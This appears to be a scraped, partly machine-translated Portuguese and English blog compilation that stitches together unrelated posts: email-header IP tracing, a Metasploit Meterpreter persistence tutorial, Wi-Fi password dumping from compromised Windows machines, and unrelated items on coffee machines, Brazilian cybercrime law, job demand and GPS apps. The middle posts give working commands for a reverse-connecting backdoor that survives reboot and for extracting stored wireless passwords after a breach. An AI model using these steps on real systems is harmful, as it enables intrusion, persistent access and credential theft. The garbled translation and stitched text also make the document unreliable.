Nesse tutorial,vou mostrar como detectar o endereço IP do remetente.
O e-mail endereço IP do remetente é depender de qual provedor de e-mail que você usa. Como sabemos, há muitos provedor de email que fornecem conta de e-mail gratuito, mas por agora só usamos Gmail, Yahoo e Windows Live Hotmail. Com a lógica como verificar o endereço IP do remetente de e-mail que eu espero que você também pode fazer o mesmo com outro provedor de e-mail.
Requirement:
1. Internet connection
Step by Step how to Check Email Sender IP Address:
1. First step I will try to send an email from Yahoo account to Gmail account.
2. In Gmail you can view the email sender IP address by show the original email in the menu.
3. When you click the link it will show some text page that displaying the details of how the message sent from Yahoo until the email arrive in your inbox. Actually the logic is the same when you sending a packet through ups or fedex, you can track the path of your packet where they made a checkpoint(but not as detail as this two logistics service).
The text “Received: from” will show you the email sender IP address (see the red box).
From this three steps, we know that if the sender use Yahoo, we can know the sender original IP address.
4. Now the next I will try to send email fro Gmail to Yahoo. Here is the screenshot.
5.To check the email sender IP address, you can click the actions and choose view full header.
6. Gmail will use the X-Originating-IP to show the sender IP address, but for the privacy they mask and change the Original email sender IP address with Google ip address.
If you see the email sender IP address in the red box above, it was Google IP address.
7. Now the last one is testing using Windows Live Hotmail. I try to send it both to Gmail and yahoo. Here is the result in Gmail.
Last year Windows Live Hotmail still have the X-Originating-IP, but start in January 2013 they said that they started to protect their users by disable the X-Originating-IP and new variable show up there as X-EIP. This X-EIP is always change dynamically even you send the same email from the same ip address, so maybe it’s a little hard enough to break it
8. Update (the real case)
When I just want to finish this tutorial, then suddenly one email come to my inbox, thanks to that guy helped me to finish this tutorial
Rea is one of my friend in Indonesia, I believe she will not sending me this kind of link
Since the sender was using yahoo account, so it is possible for us to detect the original IP address where they come from.
9. Now after knowing the email sender IP address 79.129.249.124, let’s find out more about this IP address by whois-ing here using my tools, or you can visit whatismyipaddress.com to check about that email sender IP address. Here is the result:
Conclusion:
1. From the three free email provider above, we know that the format of email header is depend on which provider we use to send that email.
2. If you send email from Gmail and Windows Live Hotmail they will hide the email sender IP address.
3. If you send email from Yahoo the recipient of your email can know your ip address.
Algumas pessoas e ACERCA estudante pedindo o que devemos fazer depois de explorar com sucesso comprometer ou vítima?
Alguns explorar Tal como CVE-2010-3962 quando a vítima Executado pode fazer computador trava. Quando algum usuário de computador trava optar por reiniciar o computador e ele vai fazer o exploit Torna-se ineficaz anterior.
O que vamos fazer aqui é Mantendo o acesso, a deixar-se uma maneira mais fácil de volta para o sistema posteriormente. Ao utilizar este método, se o serviço é para baixo ou você explorados atualizado, você ainda pode ganhar acesso ao sistema para uso futuro.
O Serviço Meterpreter Metasploit persistente é o que vamos usar neste tutorial, mas não há aviso Quando você usa esse Meterpreter persistente como mostrado neste tutorial requer nenhuma autenticação. Isto significa que ganha acesso a qualquer um que possa acessar a porta de sua porta de trás! Esta não é uma coisa boa se você está conduzindo um teste de penetração, este poderia ser como um risco significativo.
1. You need to set your payload of your exploit to meterpreter to do this method.
2. run persistence -h to view help list
3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try toconnect back to our listener every 5 seconds at IP address 192.168.8.89 on port 8080.
Notice that the script output gives you the command to “remove” the persistent listener when you are done with it. Be sure to make note of it so you don’t leave an unauthenticated backdoor on the system.
Explanation :
-U : start the backdoor when user log in to system
-i : load backdoor every 5 second
-p : will running on port 8080
-r : connect back to 192.168.8.90 (specified ip address)
4. To make sure that it works, try reboot the remote system and set up our payload handler.
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOADwindows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.90
LHOST => 192.168.8.90
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.8.90:8080
[*] Starting the payload handler...
5. When the remote user restart the system and re-login to the system, there should be like this(we should wait until the backdoor executed by remote system) :
Let we see what happen to remote user :
There’s established connection between attacker and remote host.
Esses scripts fornecer funcionalidade relacionada com o tema sem fio ou redes sem fio. O objectivo destes é o de extrair o máximo de informação que pode existir perfis sem fios armazenado na máquina violados. No Windows 7 ou Vista você obter a senha para redes WPA, enquanto o Windows XP é obtido PBKDF2 chave derivada.
O script de post/windows/wlan/wlan_bss_list fornece informações sobre as redes sem fio que tenha violado a máquina configurada. O script de pós / windows / WLAN / wlan_current_connection rede WiFi mostra que a máquina está ligada comprometida, se ele estiver conectado a um. O post script / windows / wlan / wlan_disconnect tentar desligar o aparelho violado a conexão sem fio. E, finalmente, o post script / windows / wlan / wlan_profile recupera informações em formato XML, referindo-se a redes sem fio configurados na máquina violada, incluindo informações como a senha da rede Wi-Fi.
Uma vez que você tem uma sessão Meterpreter, a primeira ação que ocorre é fazer uma lista de redes sem fio que o aparelho armazenar, este fato significa que, geralmente, em algum momento violou a máquina está ligada a essas redes .
Com o script de post/windows /wlan /wlan_profile pode obter um despejo de um arquivo em formato XML com os detalhes de redes sem fio, incluindo senhas esta informação para se conectar a redes sem fio. Na foto você pode ver uma parte do depósito, a parte em que informações sensíveis, como senha e nome da rede.
Finalmente, você também pode realizar esta operação através da linha de comando da máquina violados. Para abrir uma linha de comando comando é executado Meterpreter shell e digite netsh wlan mostra perfil para recuperar informações de redes sem fio configurados na máquina violados.
A incrível máquina de café Expresso Veloce vai deixar suas visitas boquiabertas!
A cafeteira Expresso Veloce V12 tem a forma de um motor de corrida V12 feito com materiais nobres como titânio, magnésio e alumínio. A cafeteira faz um delicioso café estilo italiano, é feita à mão e tem edição limitada em 500 unidades.
A cafeteira também está disponível na versão motor V10 e o preço só sob consulta, mas já dá para prever que é bem alto.
As auditorias web, é imprescindível a utilização de uma ferramenta como “enumeração. Isto ajuda-nos a encontrar painéis de administração, diretório com informações confidenciais. E até mesmo diretórios com permissões incorretas que permitem que lista arquivos.
Faça o download da ferramenta e ver listas de arquivos que vai procurar
Amanhã (dia 02/04/2013) entrarão em vigor as leis 12.735/2012 e 12.737/2012. Abaixo listo alguns artigos interessantes sobre o impacto das novas leis para os profissionais de segurança brasileiros (especialmente os que fazem pentest e pesquisa de vulnerabilidades) e demais atores que agora passam a estar sujeitos às penas previstas nas novas legislações, que determinam para o crime de invasão de dispositivos – por exemplo – até dois anos de prisão.
O recurso de ligações via Wi-Fi ou 3G/4G através do Facebook usando o app Messengerpara iOS e Android já estava disponível desde janeiro em alguns países. Agora, está disponível no Brasil. Já apareceu aí no seu?
Não é preciso atualizar o app, basta ter a última versão (disponível na App Store e no Google Play). Para ver se o recurso está habilitado, clique em algum contato e depois no “i” do canto superior direito.
Se sim, aparecerá a opção de realizar a chamada, “Ligação gratuita”. Apenas clique e espere o contato atender. Há relatos, ainda não confirmados, de que a opção só surja para quem cadastro o número do celular no perfil da rede social — quem não está apto ganha um botão cinza/inativo. Outra exigência é que o botão só aparece funcional se as duas pessoas tiverem a última versão do app.
Note que existe um monte de “se”, e para piorar o app não tem um filtro que facilite a descoberta de quem está habilitado para conversar. O jeito é clicar de contato em contato e ver se a opção aparece ali. Nada conveniente, mas um esforço válido na hora de economizar com voz, ou falar com alguém que você não tenha o número.
Ultrapassadas essas barreiras, porém, a qualidade da ligação é boa. Nos rápidos testes que fizemos aqui, notamos um chiado no início, mas algo bem rápido e que, em seguida, some e dá lugar a vozes bastante claras e fáceis de compreender. Nos testes com o 3G da Vivo em Niterói (valeu, Felipe!) a qualidade se manteve, então nesse ponto (qualidade de voz) não há muito do que reclamar.
Eu, porém, pareço não estar dando muita sorte. Não sei se é alguma zica com minha conexão ou com o smartphone, mas 1) não consigo fazer chamadas, só receber; e 2) elas caem após ~30 segundos. Ou talvez seja algum problema com o Facebook. Testei com três pessoas e, com todas elas os mesmos sintomas se manifestaram. Pedi ao Felipe e outros amigos que verificassem se esse problema da queda após 30s se repetia, e com eles não aconteceu. O que foi que eu te fiz pra merecer isso, Zuck?
A demanda por especialistas de segurança da informação nos Estados Unidos e em outros mercados como o Brasil está superando a oferta disponível. No Brasil a carência por esses talentos é um reflexo da falta de profissionais qualificados para atuar em diversas áreas em TI.
Relatório divulgado pela Burning Glass Technologies, empresa americana que desenvolve soluções para comparar as ofertas de profissionais com oportunidades no mercado de trabalho, mostra que a demanda por especialistas em segurança cibernética cresceu 3,5 vezes mais que a procura por talentos de TI em geral e 12 vezes mais do que todos as outras vagas de emprego.
A conclusão da Burning Glass é baseada em um estudo que avaliou ofertas de empregos para os profissionais de segurança cibernética em empresas de diversos segmentos da economia e agências do governo dos Estados Unidos nos últimos cinco anos.
De acordo com a empresa, em 2012 havia mais de 67,4 mil vagas para profissionais de segurança cibernética distribuídas por companhias de diversos segmentos da economia, incluindo empresas de defesa, setor financeiro, saúde, varejo e serviços profissionais. Esse número é 73% maior do que o número das posições ofertados em 2007, segundo a pesquisa da Burning Glass.
Em comparação, o número de ofertas para profissionais de TI de todas as áreas cresceu cerca de 20% entre 2007 e 2012, enquanto as vagas de empregos em geral aumentaram apenas 6% durante o período.
Os dois talentos de segurança mais cobiçados pelos empregadores eram engenheiros de segurança da informação e analistas de segurança.
Uma em cada três vagas ofertadas para profissionais nessa área era para os engenheiros de segurança da informação. Quase 25% das oportunidades foram para analistas de segurança.
Matt Sigelman, CEO Burning Glass Technologies, avalia que a crescente demanda por profissionais de segurança da informação indica que as empresas e agências governamentais estão investindo mais dinheiro e esforço para proteger seus dados contra ataques.
Entretanto, o executivo afirma que a maior preocupação é saber se há oferta de talentos o suficiente para atender a demanda das empresas em razão do aumento de exigências para contratação desse tipo de mão de obra.
Exigência de certificação
Por exemplo, nos últimos dois anos, a maior parte das vagas exige que os candidatos tenham o Certified Information Systems Security Professional (CISSP), que saltou de 19 mil para mais de 29 mil credenciados.
Outra indicação da dificuldade crescente de empregadores norte-americanos de encontrar profissionais de segurança da informação qualificados são os anúncios de emprego. Eles geralmente levam 35% a mais do tempo que normalmente levariam para achar talentos de TI na hora de encontrar especialistas de segurança.
Julie Peeler, diretora da Fundação ISC2, que desenvolve programa CISSP, afirma que não há dúvida de que a crescente demanda está superando a oferta de especialistas em segurança.
Para o próximo ano, a executiva estima que haverá a necessidade de mais 330 mil profissionais de segurança em todo o mundo. O problema é que a quantidade de jovens talentos que estão saiado anualmente da faculdade não atende a demanda do mercado, informa Julie.
Uma pesquisa recente da Fundação ISC2 com cerca de 12 mil profissionais de segurança da informação em todo o mundo constatou que a escassez de talentos nessa área tem gerado impacto dramático sobre a capacidade das organizações de defesa contra ataque ou de se recuperar rapidamente de invasões cibernéticas.
“[A escassez] está causando uma pressão sobre a força de trabalho existente”, diz Julie. “Eles estão tendo que trabalhar mais e mais horas.”
A crescente escassez fez com que os salários para os profissionais de segurança da informação aumentassem em comparação com muitos outros cargos de TI.
De acordo com a Burning Glass, a média de salário para profissionais de segurança da informação em 2012 era 100,7 mil dólares contra 89,2 mil dólares por ano para outros talentos de TI.
Especialistas com certificações de segurança ganham um salário modestamente mais elevado, de acordo com estudo da Burning Glass. Em muitos casos, as empresas exigem essas credenciais como uma maneira de filtrar os candidatos com conhecimento comprovado dos que não são experientes.
“A demanda é alta, mas não há oportunidade para todos”, informa Roger Cressey, vice-presidente sênior da Booz Allen Hamilton.
Embora seja verdade que os empregadores estão procurando mais profissionais de segurança da informação, eles só querem talentos com muita experiência em áreas como a segurança de rede, governança, políticas e procedimentos. “Você tem que ter as habilidades exigidas” afirma o consultor.
Cressey observou que as universidades dos Estados Unidos, hoje, não estão treinando pessoas o suficiente para lidar com a demanda explosiva por especialistas em segurança de TI. A realidade do Brasil não é muito diferente.
Algumas pessoas tem me perguntado sobre aplicativos para smartphone/tablet que sejam capazes de marcar e exportar o tracklog das trilhas que eles venham a fazer por aí. Então eu resolvi buscar alguns programas que possuem essas funções de fazer o track das trilhas, bom como outras funções – tanto no Android quanto no IOS. Uma coisa que é importante citar é que nem sempre os telefones conseguem receber bem o sinal do GPS quando estão sob vegetação mais fechada ou mesmo em dias de tempo ruim, o que pode inutilizar o app dependendo do local onde você vai caminhar.
Separei alguns apps que encontrei em pesquisas no Google e nas app stores. Alguns eu conheço, como oMaverick, GPS Essentials e o My Topo Maps para Android – inclusive já usei alguns deles. Não sei como são os apps para IOS (iPhone), mas escolhi os que tinham boas funções e avaliações positivas.
O destaque, na verdade “os destaques”, para iPhone são os três apps – todos com funções boas. Já para Android os que merecem destaque são o GPS Essentials, o Maverick e o My Topo Maps. Outra opção interessante para quem já usa o site é o app do “Wikiloc”, também para Android.
1. Apps para tracklog/GPS iPhone
Como eu citei antes os apps para o IOS não foram testados, me baseei apenas na avaliação e funções úteis deles.
1.1 – GPS KIT
O app trabalha com arquivos KML, KMZ e GPX o que permite uma integração com o Google Earth e o TrackMaker, bem como permite compartilhamentos no Facebook e Twitter. Tem bússola digital, permite segir de um waypoint para outro usando a bússola, informações sobre velocidade média, ritmo e distância, entre outras informações. Segundo o desenvolvedor o GPS Kit usa a máxima precisão do GPS para um track mais eficiente, mesmo em locais onde o sinal da operadora de telefonia não existe.
O Maps 3D, como o nome já diz, tem o diferencial de mostrar a rota sobre uma imagem em 3D – o que do ponto de vista da navegação e do planejamento da trip pode ser muito interessante! O app permite descarregar os mapas através de wi-fi ou 3G e usá-los posteriormente sem a presença de uma conexão de dados, o que é o normal em ambiente outdoor. Ele permite compartilhar os tracks via Twitter e Facebook, marcar waypoints e pontos de interesse (POIs), mostra informações sobre distância, velocidades, altitude e o quanto falta percorrer, entre outras funções!
Exporta e importa GPX, exibe informações sobre distância, altitude e velocidade, faz a gravação do track sem precisar de internet (porém para exibir o mapa é necessário uma conexão – ponto ruim do app), exibe as distâncias em kilômetros ou milhas, permite editar waypoints diretamente no mapa, etc. O ruim dele é esta questão de não trabalhar com mapas offline, infelizmente!
Esse foi um app que eu gostei muito! Principalmente por ajudar no planejamento de trilhas mostrando o mapa topográfico do local e por marcar com latitude e longitude um ponto qualquer no mapa. A versão PRO (paga) permite armazenar mapas para consulta offline. Um diferencial interessante é que ele permite sobrepor o mapa topográfico com um com imagens de satélite, permitindo uma melhor “leitura” do terreno, como mostra a imagem abaixo:
Note que existe um cursor em forma de cruz que pode ser posicionado para determinar a latitude/longitude de um ponto no mapa
É possível marcar e identificar waypoints no mapa, bem como localizar um ponto através da sua latitude/longitude, bem como marcar dois pontos e determinar a distância entre eles (em linha reta). O mesmo desenvolvedor tem outro app chamado “Trimble Outdoors Navigator“, igualmente gratuito e que permite a gravação das rotas usando o GPS do aparelho celular/tablet.
O Maverick é um dos melhores aplicativos para mapas e GPS do sistema Android, pelo menos na minha opinião, ele permite a gravação de tracklogs em GPX, compartilhamento da posição atual ou planejada nas redes sociais, informa uma série de dados (altitude, dados de velocidade, latitude/longitude e bússola), possui uma série de mapas diferentes com um destaque para o mapa de transportes urbanos que pode ajudar os viajantes a se acharem e o mapa para ciclistas que mostra as lojas de bike por perto. É um app bem completo realmente, vale um teste!
Mapa de transportes públicos do Maverick, marcando algumas linhas de ônibus da orla carioca e as estações de metrô
Detalhe interessante um mapa para ciclistas que mostra as ciclovias e lojas de bike ao redor (ícones amarelos).
Útil para quem já usa o site do Wikiloc.com, este app de mesmo nome permite acompanhar sua trip no mapa, incluir fotos e gravar o tracklog da trip no seu aparelho, bem como compartilhar o material no Facebook ou no Wikiloc.com. Vale o teste para quem curte o portal, eu não usei.
Outro canivete suíço do Android quando o assunto é GPS, tracklog e afins. Disponibiliza uma série de informações úteis – latitude, longitude, velocidades, número de satélites, horários do nascer e pôr do sol, fase da lua e muito mais! Permite marcar waypoints, gravar tracklogs, ver gráficos, adicionar fotos… A interface é bem simples, mas funcional – permite exportar os dados para KML ou GPX e inclusive fazer o upload para o Dropbox. Aceita a importação de arquivos em KML. Vale muito um teste.
Este o pessoal do trekking Brasil n comentou, é uma dica minha mesmo! Este eu uso, e posso garantir: Muito bom! Fácil de mexer.
O Google liberou uma nova versão de seu aplicativoMinhas Trilhas (também conhecido como “Os Meus Percursos”) para Android. Com uma interface totalmente renovada, o app oferece um modo fácil de gravar e compartilhar trajetos via GPS.
“Minhas Trilhas registra o seu caminho, velocidade, distância e altitude, enquanto anda, corre, anda de bicicleta ou faz qualquer outra atividade ao ar livre. Durante a gravação, você pode visualizar os seus dados ao vivo, anotar o trajeto e ouvir anúncios de voz periódicos sobre seu progresso”, explicou o buscador.
Além de contar com suporte a versão 4.0 do Android, o Minhas Trilhas também apresenta integração com o Google+, Facebook e Twitter. Você ainda pode adicionar seus dados no Google Maps e Tabela (Beta) do Google Drive e Docs.
Caso você tenha interesse em registrar mais dados, por exemplo, frequência cardíaca, o aplicativo traz suporte a sensores biométricos de terceiros, como o Zephyr HXM e Polar Wearlink, ambos com tecnologia Bluetooth.